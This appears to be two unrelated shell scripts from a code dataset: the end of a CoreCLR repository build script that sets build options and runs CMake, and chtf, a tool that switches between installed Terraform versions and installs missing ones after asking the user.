pgoinstrument|-pgoinstrument)
__PgoInstrument=1
;;
skipcrossarchnative|-skipcrossarchnative)
__SkipCrossArchNative=1
;;
staticanalyzer|-staticanalyzer)
__StaticAnalyzer=1
;;
component|-component)
__RequestedBuildComponents="$__RequestedBuildComponents $2"
__ShiftArgs=1
;;
*)
__UnprocessedBuildArgs="$__UnprocessedBuildArgs $1"
;;
esac
}
echo "Commencing CoreCLR Repo build"
# Argument types supported by this script:
#
# Build architecture - valid values are: x64, ARM.
# Build Type - valid values are: Debug, Checked, Release
#
# Set the default arguments for build
# Obtain the location of the bash script to figure out where the root of the repo is.
__ProjectRoot="$(cd "$(dirname "$0")"; pwd -P)"
__RepoRootDir="$(cd "$__ProjectRoot"/../..; pwd -P)"
__BuildArch=
__BuildType=Debug
__CodeCoverage=0
# Set the various build properties here so that CMake and MSBuild can pick them up
__Compiler=clang
__CompilerMajorVersion=
__CompilerMinorVersion=
__CommonMSBuildArgs=
__ConfigureOnly=0
__CrossBuild=0
__DistroRid=""
__PgoInstrument=0
__PgoOptDataPath=""
__PgoOptimize=1
__PortableBuild=1
__ProjectDir="$__ProjectRoot"
__RootBinDir="$__RepoRootDir/artifacts"
__SignTypeArg=""
__SkipConfigure=0
__SkipNative=0
__SkipCrossArchNative=0
__SkipGenerateVersion=0
__SkipManaged=0
__SkipRestore=""
__SkipRestoreOptData=0
__SourceDir="$__ProjectDir/src"
__StaticAnalyzer=0
__UnprocessedBuildArgs=
__UseNinja=0
__VerboseBuild=0
__CMakeArgs=""
__RequestedBuildComponents=""
source "$__ProjectRoot"/_build-commons.sh
# Set dependent variables
# Set the remaining variables based upon the determined build configuration
__LogsDir="$__RootBinDir/log/$__BuildType"
__MsbuildDebugLogsDir="$__LogsDir/MsbuildDebugLogs"
__ConfigTriplet="$__TargetOS.$__BuildArch.$__BuildType"
__BinDir="$__RootBinDir/bin/coreclr/$__ConfigTriplet"
__ArtifactsIntermediatesDir="$__RepoRootDir/artifacts/obj/coreclr"
__IntermediatesDir="$__ArtifactsIntermediatesDir/$__ConfigTriplet"
export __IntermediatesDir __ArtifactsIntermediatesDir
__CrossComponentBinDir="$__BinDir"
__CrossArch="$__HostArch"
if [[ "$__CrossBuild" == 1 ]]; then
__CrossComponentBinDir="$__CrossComponentBinDir/$__CrossArch"
fi
# CI_SPECIFIC - On CI machines, $HOME may not be set. In such a case, create a subfolder and set the variable to set.
# This is needed by CLI to function.
if [[ -z "$HOME" ]]; then
if [[ ! -d "$__ProjectDir/temp_home" ]]; then
mkdir temp_home
fi
HOME="$__ProjectDir"/temp_home
export HOME
echo "HOME not defined; setting it to $HOME"
fi
# Specify path to be set for CMAKE_INSTALL_PREFIX.
# This is where all built CoreClr libraries will copied to.
__CMakeBinDir="$__BinDir"
export __CMakeBinDir
# Make the directories necessary for build if they don't exist
setup_dirs_local
# Set up the directory for MSBuild debug logs.
MSBUILDDEBUGPATH="${__MsbuildDebugLogsDir}"
export MSBUILDDEBUGPATH
# Check prereqs.
check_prereqs
# Restore the package containing profile counts for profile-guided optimizations
restore_optdata
# Build the coreclr (native) components.
__CMakeArgs="-DCLR_CMAKE_PGO_INSTRUMENT=$__PgoInstrument -DCLR_CMAKE_OPTDATA_PATH=$__PgoOptDataPath -DCLR_CMAKE_PGO_OPTIMIZE=$__PgoOptimize $__CMakeArgs"
if [[ "$__SkipConfigure" == 0 && "$__CodeCoverage" == 1 ]]; then
__CMakeArgs="-DCLR_CMAKE_ENABLE_CODE_COVERAGE=1 $__CMakeArgs"
fi
__CMakeTarget=""
if [[ -n "$__RequestedBuildComponents" ]]; then
__CMakeTarget=" $__RequestedBuildComponents "
__CMakeTarget="${__CMakeTarget// paltests / paltests_install }"
fi
if [[ -z "$__CMakeTarget" ]]; then
__CMakeTarget="install"
fi
if [[ "$__SkipNative" == 1 ]]; then
echo "Skipping CoreCLR component build."
else
build_native "$__TargetOS" "$__BuildArch" "$__ProjectRoot" "$__IntermediatesDir" "$__CMakeTarget" "$__CMakeArgs" "CoreCLR component"
# Build cross-architecture components
if [[ "$__SkipCrossArchNative" != 1 ]]; then
if [[ "$__CrossBuild" == 1 ]]; then
build_cross_architecture_components
fi
fi
fi
# Build complete
echo "Repo successfully built."
echo "Product binaries are available at $__BinDir"
exit 0
|
# Copyright (c) 2012-2016 Hal Brodigan
# Copyright (c) 2016-2018 Yleisradio Oy
# Copyright (c) 2020 Teemu Matilainen
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# 'Software'), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CHTF_VERSION='2.1.1-dev'
# Set defaults
: "${CHTF_AUTO_INSTALL:=ask}"
if [[ -z "$CHTF_TERRAFORM_DIR" ]]; then
if [[ "$CHTF_AUTO_INSTALL_METHOD" == 'homebrew' ]]; then
CHTF_TERRAFORM_DIR="$(brew --caskroom)"
elif [[ -z "$CHTF_AUTO_INSTALL_METHOD" ]] &&
command -v brew >/dev/null &&
[[ -d "$(brew --repo)/Library/Taps/yleisradio/homebrew-terraforms" ]]; then
# https://github.com/Yleisradio/homebrew-terraforms in use
CHTF_TERRAFORM_DIR="$(brew --caskroom)"
CHTF_AUTO_INSTALL_METHOD='homebrew'
else
CHTF_TERRAFORM_DIR="$HOME/.terraforms"
fi
fi
: "${CHTF_AUTO_INSTALL_METHOD:=zip}"
chtf() {
case "$1" in
-h|--help)
echo "usage: chtf [<version> | system]"
;;
-V|--version)
echo "chtf: $CHTF_VERSION"
;;
"")
_chtf_list
;;
system)
_chtf_reset
;;
*)
_chtf_use "$1"
;;
esac
}
_chtf_reset() {
[[ -z "$CHTF_CURRENT" ]] && return 0
PATH=":$PATH:"; PATH="${PATH//:$CHTF_CURRENT:/:}"
PATH="${PATH#:}"; PATH="${PATH%:}"
hash -r
unset CHTF_CURRENT
unset CHTF_CURRENT_TERRAFORM_VERSION
}
_chtf_use() {
local tf_version="$1"
local tf_path="$CHTF_TERRAFORM_DIR/terraform-$tf_version"
# Homebrew adds a subdir named by the package version, so we test also that
if [[ ! -x "$tf_path/terraform" && ! -x "$tf_path/$tf_version/terraform" ]]; then
_chtf_install "$tf_version" || return 1
fi
if [[ -x "$tf_path/$tf_version/terraform" ]]; then
tf_path="$tf_path/$tf_version"
elif [[ ! -x "$tf_path/terraform" ]]; then
echo "chtf: Failed to find terraform executable in $tf_path" >&2
return 1
fi
_chtf_reset
export CHTF_CURRENT="$tf_path"
export CHTF_CURRENT_TERRAFORM_VERSION="$tf_version"
export PATH="$CHTF_CURRENT:$PATH"
}
_chtf_list() (
# Avoid glob matching errors.
# Note that we do this in a subshell to restrict the scope.
# bash
shopt -s nullglob 2>/dev/null || true
# zsh
setopt null_glob 2>/dev/null || true
for tf_path in "$CHTF_TERRAFORM_DIR"/terraform-*; do
local tf_version="${tf_path##*/terraform-}"
if [[ -x "$tf_path/$tf_version/terraform" ]]; then
tf_path="$tf_path/$tf_version"
elif [[ ! -x "$tf_path/terraform" ]]; then
continue
fi
printf '%s %s\n' "$(_chtf_list_prefix "$tf_path")" "$tf_version"
done;
)
_chtf_list_prefix() {
local tf_path="$1"
if [[ "$tf_path" == "$CHTF_CURRENT" ]]; then
printf ' *'
else
printf ' '
fi
}
_chtf_install() {
local tf_version="$1"
echo "chtf: Terraform version $tf_version not found" >&2
local install_function="_chtf_install_$CHTF_AUTO_INSTALL_METHOD"
if ! command -v "$install_function" >/dev/null; then
echo "chtf: Unknown install method: $CHTF_AUTO_INSTALL_METHOD" >&2
return 1
fi
_chtf_confirm "$tf_version" || return 1
echo "chtf: Installing Terraform version $tf_version"
$install_function "$tf_version"
}
_chtf_install_homebrew() {
local tf_version="$1"
brew cask install "terraform-$tf_version"
}
_chtf_install_zip() {
local tf_version="$1"
local tf_dir="$CHTF_TERRAFORM_DIR/terraform-$tf_version"
mkdir -p "$tf_dir"
env TF_INSTALL_DIR="$tf_dir" "$(_chtf_root_dir)"/__chtf_terraform-install.sh -i "$tf_version"
}
_chtf_confirm() {
case "$CHTF_AUTO_INSTALL" in
no|false|0)
return 1;;
ask)
printf 'chtf: Do you want to install it? [yN] '
if [[ -n "$ZSH_NAME" ]]; then
# shellcheck disable=SC2162 # ignore zsh command
read -k reply
else
read -n 1 -r reply
fi
echo
[[ "$reply" == [Yy] ]] || return 1
;;
esac
}
_chtf_root_dir() {
if [[ -n "$BASH" ]]; then
dirname "${BASH_SOURCE[0]}"
elif [[ -n "$ZSH_NAME" ]]; then
dirname "${(%):-%x}"
else
echo 'chtf: [WARN] Unknown shell' >&2
fi
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.